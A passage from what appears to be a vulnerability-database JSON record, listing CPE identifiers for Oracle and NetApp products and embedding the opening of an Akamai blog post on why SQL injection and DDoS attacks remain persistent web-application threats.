"cpe:2.3:a:oracle:retail_financial_integration:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_point-of-service:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:hospitality_guest_access:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:tape_library_acsls:8.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:hospitality_guest_access:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:oracle:retail_financial_integration:13.2:*:*:*:*:*:*:*"]}], "akamaiblog": [{"lastseen": "2020-09-09T13:53:38", "description": "SQL injections were first discovered in 1998, and over 20 years later, they remain an unsolved challenge and an ongoing threat for every web application and API. The Open Web Application Security Project (OWASP) highlighted injection flaws in its Top 10 lists for both [web application security risks](<https://owasp.org/www-project-top-ten/>) and [API security threats](<https://owasp.org/www-project-api-security/>). \n\nFor Akamai customers, SQL injections comprised 76% of all web application attacks detected over the past two years.\n\nThe reasons why SQL injections remain a challenge in 2020 are the same as those that have driven the growth of the World Wide Web ([and Akamai with it](<https://www.streamingmediablog.com/2020/08/akamai-milestone.html>)) over the past two decades:\n\n * There is more information online than ever before, including [information that has financial value](<https://content.akamai.com/PG2564-Weighing-Risk-Against-Data-Breach.html>), and is therefore a target for attackers\n * The number of web applications is rapidly growing, and Akamai customers often have hundreds of applications that collectively represent their digital experience\n * Web applications have become highly complex, with many different components and technologies; the first-party and open source code in apps pose growing vulnerabilities, as do the many connections between services -- all of which can be exploited at any weak point\n * Developers don't always think about security, and security teams aren't able to keep up with the increasing number of complex applications they're chartered to protect\n\nAll of these factors contribute to security teams having difficulty keeping security up to date in constantly changing apps. But that's only half of the equation. 
Rapid iteration also creates a steady stream of possible new vulnerabilities and attack vectors designed to exploit them.\n\n### DDoS Protection Starts with Zero-Second Mitigation\n\nMost customers start their [web application and API protection (WAAP)](<https://www.gartner.com/en/documents/3903064/defining-cloud-web-application-and-api-protection-servic>) journey with distributed denial-of-service (DDo